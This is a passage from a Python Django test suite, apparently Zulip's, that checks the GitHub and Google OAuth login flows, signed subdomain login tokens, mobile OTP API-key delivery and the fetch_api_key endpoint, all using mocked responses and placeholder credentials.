request.user = self.user_profile
self.backend.strategy.request = request
def do_auth(self, *args, **kwargs):
# type: (*Any, **Any) -> UserProfile
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.GitHubAuthBackend',)):
return authenticate(**kwargs)
def test_github_auth_enabled(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.GitHubAuthBackend',)):
self.assertTrue(github_auth_enabled())
def test_full_name_with_missing_key(self):
# type: () -> None
self.assertEqual(self.backend.get_full_name(), '')
self.assertEqual(self.backend.get_full_name(response={'name': None}), '')
def test_full_name_with_none(self):
# type: () -> None
self.assertEqual(self.backend.get_full_name(response={'email': None}), '')
def test_github_backend_do_auth_with_non_existing_subdomain(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=self.do_auth):
self.backend.strategy.session_set('subdomain', 'test')
response = dict(email=self.email, name=self.name)
result = self.backend.do_auth(response=response)
assert(result is not None)
self.assertIn('subdomain=1', result.url)
def test_github_backend_do_auth_with_subdomains(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=self.do_auth):
self.backend.strategy.session_set('subdomain', 'zulip')
response = dict(email=self.email, name=self.name)
result = self.backend.do_auth(response=response)
assert(result is not None)
self.assertTrue(result.url.startswith('http://zulip.testserver/accounts/login/subdomain/'))
def test_github_backend_do_auth_for_default(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=self.do_auth), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
response = dict(email=self.email, name=self.name)
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(self.user_profile, 'fake-access-token', **kwargs)
def test_github_backend_do_auth_for_default_auth_failed(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=AuthFailed('Not found')), \
mock.patch('logging.info'), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
response = dict(email=self.email, name=self.name)
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(None, 'fake-access-token', **kwargs)
def test_github_backend_do_auth_for_team(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubTeamOAuth2.do_auth',
side_effect=self.do_auth), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
self.backend.strategy.session_set('subdomain', 'zulip')
response = dict(email=self.email, name=self.name)
with self.settings(SOCIAL_AUTH_GITHUB_TEAM_ID='zulip-webapp'):
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(self.user_profile, 'fake-access-token', **kwargs)
def test_github_backend_do_auth_for_team_auth_failed(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubTeamOAuth2.do_auth',
side_effect=AuthFailed('Not found')), \
mock.patch('logging.info'), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
self.backend.strategy.session_set('subdomain', 'zulip')
response = dict(email=self.email, name=self.name)
with self.settings(SOCIAL_AUTH_GITHUB_TEAM_ID='zulip-webapp'):
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(None, 'fake-access-token', **kwargs)
def test_github_backend_do_auth_for_org(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOrganizationOAuth2.do_auth',
side_effect=self.do_auth), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
self.backend.strategy.session_set('subdomain', 'zulip')
response = dict(email=self.email, name=self.name)
with self.settings(SOCIAL_AUTH_GITHUB_ORG_NAME='Zulip'):
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(self.user_profile, 'fake-access-token', **kwargs)
def test_github_backend_do_auth_for_org_auth_failed(self):
# type: () -> None
with mock.patch('social_core.backends.github.GithubOrganizationOAuth2.do_auth',
side_effect=AuthFailed('Not found')), \
mock.patch('logging.info'), \
mock.patch('zproject.backends.SocialAuthMixin.process_do_auth') as result:
self.backend.strategy.session_set('subdomain', 'zulip')
response = dict(email=self.email, name=self.name)
with self.settings(SOCIAL_AUTH_GITHUB_ORG_NAME='Zulip'):
self.backend.do_auth('fake-access-token', response=response)
kwargs = {'realm_subdomain': 'zulip',
'response': response,
'return_data': {}}
result.assert_called_with(None, 'fake-access-token', **kwargs)
def test_github_backend_authenticate_nonexisting_user(self):
# type: () -> None
with mock.patch('zproject.backends.get_user_profile_by_email',
side_effect=UserProfile.DoesNotExist("Do not exist")):
response = dict(email=self.email, name=self.name)
return_data = dict() # type: Dict[str, Any]
user = self.backend.authenticate(return_data=return_data, response=response)
self.assertIs(user, None)
self.assertTrue(return_data['valid_attestation'])
def test_github_backend_authenticate_invalid_email(self):
# type: () -> None
response = dict(email=None, name=self.name)
return_data = dict() # type: Dict[str, Any]
user = self.backend.authenticate(return_data=return_data, response=response)
self.assertIs(user, None)
self.assertTrue(return_data['invalid_email'])
def test_github_backend_inactive_user(self):
# type: () -> None
def do_auth_inactive(*args, **kwargs):
# type: (*Any, **Any) -> UserProfile
return_data = kwargs['return_data']
return_data['inactive_user'] = True
return self.user_profile
with mock.patch('zerver.views.auth.login_or_register_remote_user') as result, \
mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=do_auth_inactive):
response = dict(email=self.email, name=self.name)
user = self.backend.do_auth(response=response)
result.assert_not_called()
self.assertIs(user, None)
def test_github_backend_new_user_wrong_domain(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/complete')
request.session = {}
request.user = self.user_profile
self.backend.strategy.request = request
session_data = {'subdomain': Realm.SUBDOMAIN_FOR_ROOT_DOMAIN, 'is_signup': '1'}
self.backend.strategy.session_get = lambda k: session_data.get(k)
def do_auth(*args, **kwargs):
# type: (*Any, **Any) -> None
return_data = kwargs['return_data']
return_data['valid_attestation'] = True
return None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=do_auth):
email = '[email protected]'
response = dict(email=email, name='Ghost')
result = self.backend.do_auth(response=response)
self.assert_in_response('action="/register/"', result)
self.assert_in_response('Your email address, {}, is not '
'in one of the domains that are allowed to register '
'for accounts in this organization.'.format(email), result)
def test_github_backend_new_user(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/complete')
request.session = {}
request.user = self.user_profile
self.backend.strategy.request = request
session_data = {'subdomain': Realm.SUBDOMAIN_FOR_ROOT_DOMAIN, 'is_signup': '1'}
self.backend.strategy.session_get = lambda k: session_data.get(k)
def do_auth(*args, **kwargs):
# type: (*Any, **Any) -> None
return_data = kwargs['return_data']
return_data['valid_attestation'] = True
return None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=do_auth):
email = self.nonreg_email('newuser')
name = "Ghost"
response = dict(email=email, name=name)
result = self.backend.do_auth(response=response)
confirmation = Confirmation.objects.all().first()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
result = self.client_get(result.url)
self.assert_in_response('action="/accounts/register/"', result)
data = {"from_confirmation": "1",
"full_name": name,
"key": confirmation_key}
result = self.client_post('/accounts/register/', data)
self.assert_in_response("You're almost there", result)
# Verify that the user is asked for name but not password
self.assert_not_in_success_response(['id_password'], result)
self.assert_in_success_response(['id_full_name'], result)
result = self.client_post(
'/accounts/register/',
{'full_name': name,
'key': confirmation_key,
'terms': True})
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user('newuser')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_github_backend_existing_user(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/complete')
request.session = {}
request.user = self.user_profile
self.backend.strategy.request = request
session_data = {'subdomain': Realm.SUBDOMAIN_FOR_ROOT_DOMAIN, 'is_signup': '1'}
self.backend.strategy.session_get = lambda k: session_data.get(k)
def do_auth(*args, **kwargs):
# type: (*Any, **Any) -> None
return_data = kwargs['return_data']
return_data['valid_attestation'] = True
return None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=do_auth):
email = self.example_email("hamlet")
response = dict(email=email, name='Hamlet')
result = self.backend.do_auth(response=response)
self.assert_in_response('action="/register/"', result)
self.assert_in_response('[email protected] already has an account',
result)
def test_github_backend_new_user_when_is_signup_is_false(self):
# type: () -> None
rf = RequestFactory()
request = rf.get('/complete')
request.session = {}
request.user = self.user_profile
self.backend.strategy.request = request
session_data = {'subdomain': Realm.SUBDOMAIN_FOR_ROOT_DOMAIN, 'is_signup': '0'}
self.backend.strategy.session_get = lambda k: session_data.get(k)
def do_auth(*args, **kwargs):
# type: (*Any, **Any) -> None
return_data = kwargs['return_data']
return_data['valid_attestation'] = True
return None
with mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=do_auth):
email = '[email protected]'
response = dict(email=email, name='Ghost')
result = self.backend.do_auth(response=response)
self.assert_in_response(
'action="/register/"', result)
self.assert_in_response('No account found for',
result)
self.assert_in_response('[email protected]. Would you like to register instead?',
result)
def test_login_url(self):
# type: () -> None
result = self.client_get('/accounts/login/social/github')
self.assertIn(reverse('social:begin', args=['github']), result.url)
self.assertIn('is_signup=0', result.url)
def test_signup_url(self):
# type: () -> None
result = self.client_get('/accounts/register/social/github')
self.assertIn(reverse('social:begin', args=['github']), result.url)
self.assertIn('is_signup=1', result.url)
def test_github_complete(self):
# type: () -> None
from social_django import utils
utils.BACKENDS = ('zproject.backends.GitHubAuthBackend',)
with mock.patch('social_core.backends.oauth.BaseOAuth2.process_error',
side_effect=AuthFailed('Not found')):
result = self.client_get(reverse('social:complete', args=['github']))
self.assertEqual(result.status_code, 302)
self.assertIn('login', result.url)
utils.BACKENDS = settings.AUTHENTICATION_BACKENDS
def test_github_complete_when_base_exc_is_raised(self):
# type: () -> None
from social_django import utils
utils.BACKENDS = ('zproject.backends.GitHubAuthBackend',)
with mock.patch('social_core.backends.oauth.BaseOAuth2.auth_complete',
side_effect=AuthStateForbidden('State forbidden')), \
mock.patch('zproject.backends.logging.warning'):
result = self.client_get(reverse('social:complete', args=['github']))
self.assertEqual(result.status_code, 302)
self.assertIn('login', result.url)
utils.BACKENDS = settings.AUTHENTICATION_BACKENDS
def test_github_complete_when_email_is_invalid(self):
# type: () -> None
from social_django import utils
utils.BACKENDS = ('zproject.backends.GitHubAuthBackend',)
with mock.patch('zproject.backends.GitHubAuthBackend.get_email_address',
return_value=None) as mock_get_email_address, \
mock.patch('social_core.backends.oauth.OAuthAuth.validate_state',
return_value='state'), \
mock.patch('social_core.backends.oauth.BaseOAuth2.request_access_token',
return_value={'access_token': 'token'}), \
mock.patch('social_core.backends.github.GithubOAuth2.do_auth',
side_effect=self.do_auth), \
mock.patch('zproject.backends.logging.warning'):
result = self.client_get(reverse('social:complete', args=['github']),
info={'state': 'state'})
self.assertEqual(result.status_code, 200)
self.assert_in_response("Please click the following button "
"if you wish to register.", result)
self.assertEqual(mock_get_email_address.call_count, 2)
utils.BACKENDS = settings.AUTHENTICATION_BACKENDS
class ResponseMock(object):
def __init__(self, status_code, data):
# type: (int, Any) -> None
self.status_code = status_code
self.data = data
def json(self):
# type: () -> str
return self.data
@property
def text(self):
# type: () -> str
return "Response text"
class GoogleOAuthTest(ZulipTestCase):
def google_oauth2_test(self, token_response, account_response, *, subdomain=None,
mobile_flow_otp=None, is_signup=None):
# type: (ResponseMock, ResponseMock, Optional[str], Optional[str], Optional[str]) -> HttpResponse
url = "/accounts/login/google/"
params = {}
headers = {}
if subdomain is not None:
headers['HTTP_HOST'] = subdomain + ".testserver"
if mobile_flow_otp is not None:
params['mobile_flow_otp'] = mobile_flow_otp
headers['HTTP_USER_AGENT'] = "ZulipAndroid"
if is_signup is not None:
params['is_signup'] = is_signup
if len(params) > 0:
url += "?%s" % (urllib.parse.urlencode(params))
result = self.client_get(url, **headers)
if result.status_code != 302 or '/accounts/login/google/send/' not in result.url:
return result
# Now do the /google/send/ request
result = self.client_get(result.url, **headers)
self.assertEqual(result.status_code, 302)
if 'google' not in result.url:
return result
self.client.cookies = result.cookies
# Now extract the CSRF token from the redirect URL
parsed_url = urllib.parse.urlparse(result.url)
csrf_state = urllib.parse.parse_qs(parsed_url.query)['state']
with mock.patch("requests.post", return_value=token_response), (
mock.patch("requests.get", return_value=account_response)):
result = self.client_get("/accounts/login/google/done/",
dict(state=csrf_state), **headers)
return result
class GoogleSubdomainLoginTest(GoogleOAuthTest):
def test_google_oauth2_start(self):
# type: () -> None
result = self.client_get('/accounts/login/google/', subdomain="zulip")
self.assertEqual(result.status_code, 302)
parsed_url = urllib.parse.urlparse(result.url)
subdomain = urllib.parse.parse_qs(parsed_url.query)['subdomain']
self.assertEqual(subdomain, ['zulip'])
def test_google_oauth2_success(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip')
data = load_subdomain_token(result)
self.assertEqual(data['email'], self.example_email("hamlet"))
self.assertEqual(data['name'], 'Full Name')
self.assertEqual(data['subdomain'], 'zulip')
self.assertEqual(result.status_code, 302)
parsed_url = urllib.parse.urlparse(result.url)
uri = "{}://{}{}".format(parsed_url.scheme, parsed_url.netloc,
parsed_url.path)
self.assertTrue(uri.startswith('http://zulip.testserver/accounts/login/subdomain/'))
def test_google_oauth2_no_fullname(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(givenName="Test", familyName="User"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip')
data = load_subdomain_token(result)
self.assertEqual(data['email'], self.example_email("hamlet"))
self.assertEqual(data['name'], 'Test User')
self.assertEqual(data['subdomain'], 'zulip')
self.assertEqual(result.status_code, 302)
parsed_url = urllib.parse.urlparse(result.url)
uri = "{}://{}{}".format(parsed_url.scheme, parsed_url.netloc,
parsed_url.path)
self.assertTrue(uri.startswith('http://zulip.testserver/accounts/login/subdomain/'))
def test_google_oauth2_mobile_success(self):
# type: () -> None
mobile_flow_otp = '1234abcd' * 8
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
self.assertEqual(len(mail.outbox), 0)
with self.settings(SEND_LOGIN_EMAILS=True):
# Verify that the right thing happens with an invalid-format OTP
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip',
mobile_flow_otp="1234")
self.assert_json_error(result, "Invalid OTP")
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip',
mobile_flow_otp="invalido" * 8)
self.assert_json_error(result, "Invalid OTP")
# Now do it correctly
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip',
mobile_flow_otp=mobile_flow_otp)
self.assertEqual(result.status_code, 302)
redirect_url = result['Location']
parsed_url = urllib.parse.urlparse(redirect_url)
query_params = urllib.parse.parse_qs(parsed_url.query)
self.assertEqual(parsed_url.scheme, 'zulip')
self.assertEqual(query_params["realm"], ['http://zulip.testserver'])
self.assertEqual(query_params["email"], [self.example_email("hamlet")])
encrypted_api_key = query_params["otp_encrypted_api_key"][0]
self.assertEqual(self.example_user('hamlet').api_key,
otp_decrypt_api_key(encrypted_api_key, mobile_flow_otp))
self.assertEqual(len(mail.outbox), 1)
self.assertIn('Zulip on Android', mail.outbox[0].body)
def get_log_into_subdomain(self, data, *, key=None, subdomain='zulip'):
# type: (Dict[str, Any], Optional[str], str) -> HttpResponse
token = signing.dumps(data, salt=_subdomain_token_salt, key=key)
url_path = reverse('zerver.views.auth.log_into_subdomain', args=[token])
return self.client_get(url_path, subdomain=subdomain)
def test_log_into_subdomain(self):
# type: () -> None
data = {'name': 'Full Name',
'email': self.example_email("hamlet"),
'subdomain': 'zulip',
'is_signup': False}
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 302)
user_profile = self.example_user('hamlet')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
# If authenticate_remote_user detects a subdomain mismatch, then
# the result should redirect to the login page.
with mock.patch(
'zerver.views.auth.authenticate_remote_user',
return_value=(None, {'invalid_subdomain': True})):
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 302)
self.assertTrue(result['Location'].endswith, '?subdomain=1')
def test_log_into_subdomain_when_signature_is_bad(self):
# type: () -> None
data = {'name': 'Full Name',
'email': self.example_email("hamlet"),
'subdomain': 'zulip',
'is_signup': False}
with mock.patch('logging.warning') as mock_warning:
result = self.get_log_into_subdomain(data, key='nonsense')
mock_warning.assert_called_with("Subdomain cookie: Bad signature.")
self.assertEqual(result.status_code, 400)
def test_log_into_subdomain_when_signature_is_expired(self):
# type: () -> None
data = {'name': 'Full Name',
'email': self.example_email("hamlet"),
'subdomain': 'zulip',
'is_signup': False}
with mock.patch('django.core.signing.time.time', return_value=time.time() - 45):
token = signing.dumps(data, salt=_subdomain_token_salt)
url_path = reverse('zerver.views.auth.log_into_subdomain', args=[token])
with mock.patch('logging.warning') as mock_warning:
result = self.client_get(url_path, subdomain='zulip')
mock_warning.assert_called_once()
self.assertEqual(result.status_code, 400)
def test_log_into_subdomain_when_is_signup_is_true(self):
# type: () -> None
data = {'name': 'Full Name',
'email': self.example_email("hamlet"),
'subdomain': 'zulip',
'is_signup': True}
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 200)
self.assert_in_response('[email protected] already has an account', result)
def test_log_into_subdomain_when_is_signup_is_true_and_new_user(self):
# type: () -> None
data = {'name': 'New User Name',
'email': '[email protected]',
'subdomain': 'zulip',
'is_signup': True}
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 302)
confirmation = Confirmation.objects.all().first()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
result = self.client_get(result.url)
self.assert_in_response('action="/accounts/register/"', result)
data = {"from_confirmation": "1",
"full_name": data['name'],
"key": confirmation_key}
result = self.client_post('/accounts/register/', data, subdomain="zulip")
self.assert_in_response("You're almost there", result)
# Verify that the user is asked for name but not password
self.assert_not_in_success_response(['id_password'], result)
self.assert_in_success_response(['id_full_name'], result)
def test_log_into_subdomain_when_using_invite_link(self):
# type: () -> None
data = {'name': 'New User Name',
'email': '[email protected]',
'subdomain': 'zulip',
'is_signup': True}
realm = get_realm("zulip")
realm.invite_required = True
realm.save()
stream_names = ["new_stream_1", "new_stream_2"]
streams = []
for stream_name in set(stream_names):
stream, _ = create_stream_if_needed(realm, stream_name)
streams.append(stream)
# Without the invite link, we can't create an account due to invite_required
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 200)
self.assert_in_success_response(['Sign up for Zulip'], result)
# Now confirm an invitation link works
referrer = self.example_user("hamlet")
multiuse_obj = MultiuseInvite.objects.create(realm=realm, referred_by=referrer)
multiuse_obj.streams = streams
multiuse_obj.save()
invite_link = create_confirmation_link(multiuse_obj, realm.host,
Confirmation.MULTIUSE_INVITE)
result = self.client_get(invite_link, subdomain="zulip")
self.assert_in_success_response(['Sign up for Zulip'], result)
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 302)
confirmation = Confirmation.objects.all().last()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
result = self.client_get(result.url)
self.assert_in_response('action="/accounts/register/"', result)
data2 = {"from_confirmation": "1",
"full_name": data['name'],
"key": confirmation_key}
result = self.client_post('/accounts/register/', data2, subdomain="zulip")
self.assert_in_response("You're almost there", result)
# Verify that the user is asked for name but not password
self.assert_not_in_success_response(['id_password'], result)
self.assert_in_success_response(['id_full_name'], result)
# Click confirm registration button.
result = self.client_post(
'/accounts/register/',
{'full_name': 'New User Name',
'key': confirmation_key,
'terms': True})
self.assertEqual(result.status_code, 302)
self.assertEqual(sorted(self.get_streams('[email protected]', realm)), stream_names)
def test_log_into_subdomain_when_email_is_none(self):
# type: () -> None
data = {'name': None,
'email': None,
'subdomain': 'zulip',
'is_signup': False}
with mock.patch('logging.warning'):
result = self.get_log_into_subdomain(data)
self.assertEqual(result.status_code, 200)
self.assert_in_response("Please click the following button if you "
"wish to register", result)
def test_user_cannot_log_into_nonexisting_realm(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response,
subdomain='nonexistent')
self.assert_in_success_response(["There is no Zulip organization hosted at this subdomain."],
result)
def test_user_cannot_log_into_wrong_subdomain(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response,
subdomain='zephyr')
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith("http://zephyr.testserver/accounts/login/subdomain/"))
result = self.client_get(result.url.replace('http://zephyr.testserver', ''),
subdomain="zephyr")
self.assertEqual(result.status_code, 302)
result = self.client_get('/accounts/login/?subdomain=1', subdomain="zephyr")
self.assert_in_success_response(["Your Zulip account is not a member of the organization associated with this subdomain."],
result)
def test_user_cannot_log_into_wrong_subdomain_with_cookie(self):
# type: () -> None
data = {'name': 'Full Name',
'email': self.example_email("hamlet"),
'subdomain': 'zephyr'}
with mock.patch('logging.warning') as mock_warning:
result = self.get_log_into_subdomain(data)
mock_warning.assert_called_with("Login attempt on invalid subdomain")
self.assertEqual(result.status_code, 400)
def test_google_oauth2_registration(self):
# type: () -> None
"""If the user doesn't exist yet, Google auth can be used to register an account"""
email = "[email protected]"
realm = get_realm("zulip")
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=email)])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response, subdomain='zulip',
is_signup='1')
data = load_subdomain_token(result)
name = 'Full Name'
self.assertEqual(data['email'], email)
self.assertEqual(data['name'], name)
self.assertEqual(data['subdomain'], 'zulip')
self.assertEqual(result.status_code, 302)
parsed_url = urllib.parse.urlparse(result.url)
uri = "{}://{}{}".format(parsed_url.scheme, parsed_url.netloc,
parsed_url.path)
self.assertTrue(uri.startswith('http://zulip.testserver/accounts/login/subdomain/'))
result = self.client_get(result.url)
self.assertEqual(result.status_code, 302)
confirmation = Confirmation.objects.all().first()
confirmation_key = confirmation.confirmation_key
self.assertIn('do_confirm/' + confirmation_key, result.url)
result = self.client_get(result.url)
self.assert_in_response('action="/accounts/register/"', result)
data = {"from_confirmation": "1",
"full_name": name,
"key": confirmation_key}
result = self.client_post('/accounts/register/', data)
self.assert_in_response("You're almost there", result)
# Verify that the user is asked for name but not password
self.assert_not_in_success_response(['id_password'], result)
self.assert_in_success_response(['id_full_name'], result)
# Click confirm registration button.
result = self.client_post(
'/accounts/register/',
{'full_name': name,
'key': confirmation_key,
'terms': True})
self.assertEqual(result.status_code, 302)
user_profile = get_user(email, realm)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
class GoogleLoginTest(GoogleOAuthTest):
@override_settings(ROOT_DOMAIN_LANDING_PAGE=True)
def test_google_oauth2_subdomains_homepage(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[dict(type="account",
value=self.example_email("hamlet"))])
account_response = ResponseMock(200, account_data)
result = self.google_oauth2_test(token_response, account_response, subdomain="")
self.assertEqual(result.status_code, 302)
self.assertIn('subdomain=1', result.url)
def test_google_oauth2_400_token_response(self):
# type: () -> None
token_response = ResponseMock(400, {})
with mock.patch("logging.warning") as m:
result = self.google_oauth2_test(token_response, ResponseMock(500, {}))
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
"User error converting Google oauth2 login to token: Response text")
def test_google_oauth2_500_token_response(self):
# type: () -> None
token_response = ResponseMock(500, {})
with mock.patch("logging.error") as m:
result = self.google_oauth2_test(token_response, ResponseMock(500, {}))
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
"Could not convert google oauth2 code to access_token: Response text")
def test_google_oauth2_400_account_response(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_response = ResponseMock(400, {})
with mock.patch("logging.warning") as m:
result = self.google_oauth2_test(token_response, account_response)
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
"Google login failed making info API call: Response text")
def test_google_oauth2_500_account_response(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_response = ResponseMock(500, {})
with mock.patch("logging.error") as m:
result = self.google_oauth2_test(token_response, account_response)
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
"Google login failed making API call: Response text")
def test_google_oauth2_account_response_no_email(self):
# type: () -> None
token_response = ResponseMock(200, {'access_token': "unique_token"})
account_data = dict(name=dict(formatted="Full Name"),
emails=[])
account_response = ResponseMock(200, account_data)
with mock.patch("logging.error") as m:
result = self.google_oauth2_test(token_response, account_response,
subdomain="zulip")
self.assertEqual(result.status_code, 400)
self.assertIn("Google oauth2 account email not found:", m.call_args_list[0][0][0])
def test_google_oauth2_error_access_denied(self):
# type: () -> None
result = self.client_get("/accounts/login/google/done/?error=access_denied")
self.assertEqual(result.status_code, 302)
path = urllib.parse.urlparse(result.url).path
self.assertEqual(path, "/")
def test_google_oauth2_error_other(self):
# type: () -> None
with mock.patch("logging.warning") as m:
result = self.client_get("/accounts/login/google/done/?error=some_other_error")
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
"Error from google oauth2 login: some_other_error")
def test_google_oauth2_missing_csrf(self):
# type: () -> None
with mock.patch("logging.warning") as m:
result = self.client_get("/accounts/login/google/done/")
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
'Missing Google oauth2 CSRF state')
def test_google_oauth2_csrf_malformed(self):
# type: () -> None
with mock.patch("logging.warning") as m:
result = self.client_get("/accounts/login/google/done/?state=badstate")
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
'Missing Google oauth2 CSRF state')
def test_google_oauth2_csrf_badstate(self):
# type: () -> None
with mock.patch("logging.warning") as m:
result = self.client_get("/accounts/login/google/done/?state=badstate:otherbadstate:more::")
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
'Google oauth2 CSRF error')
class FetchAPIKeyTest(ZulipTestCase):
def setUp(self):
# type: () -> None
self.user_profile = self.example_user('hamlet')
self.email = self.user_profile.email
def test_success(self):
# type: () -> None
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password=initial_password(self.email)))
self.assert_json_success(result)
def test_invalid_email(self):
# type: () -> None
result = self.client_post("/api/v1/fetch_api_key",
dict(username='hamlet',
password=initial_password(self.email)))
self.assert_json_error(result, "Enter a valid email address.", 400)
def test_wrong_password(self):
# type: () -> None
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password="wrong"))
self.assert_json_error(result, "Your username or password is incorrect.", 403)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GoogleMobileOauth2Backend',),
SEND_LOGIN_EMAILS=True)
def test_google_oauth2_token_success(self):
# type: () -> None
self.assertEqual(len(mail.outbox), 0)
with mock.patch(
'apiclient.sample_tools.client.verify_id_token',
return_value={
"email_verified": True,
"email": self.example_email("hamlet"),
}):
result = self.client_post("/api/v1/fetch_api_key",
dict(username="google-oauth2-token",
password="token"))
self.assert_json_success(result)
self.assertEqual(len(mail.outbox), 1)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GoogleMobileOauth2Backend',))
def test_google_oauth2_token_failure(self):
# type: () -> None
payload = dict(email_verified=False)
with mock.patch('apiclient.sample_tools.client.verify_id_token', return_value=payload):
result = self.client_post("/api/v1/fetch_api_key",
dict(username="google-oauth2-token",
password="token"))
self.assert_json_error(result, "Your username or password is incorrect.", 403)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GoogleMobileOauth2Backend',))
def test_google_oauth2_token_unregistered(self):
# type: () -> None
with mock.patch(
'apiclient.sample_tools.client.verify_id_token',
return_value={
"email_verified": True,
"email": "[email protected]",
}):
result = self.client_post("/api/v1/fetch_api_key",
dict(username="google-oauth2-token",
password="token"))
self.assert_json_error(
result,
"This user is not registered; do so from a browser.",
403)
def test_password_auth_disabled(self):
# type: () -> None
with mock.patch('zproject.backends.password_auth_enabled', return_value=False):
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password=initial_password(self.email)))
self.assert_json_error_contains(result, "Password auth is disabled", 403)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_ldap_auth_email_auth_disabled_success(self):
# type: () -> None
ldap_patcher = mock.patch('django_auth_ldap.config.ldap.initialize')
self.mock_initialize = ldap_patcher.start()
self.mock_ldap = MockLDAP()
self.mock_initialize.return_value = self.mock_ldap
self.backend = ZulipLDAPAuthBackend()
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
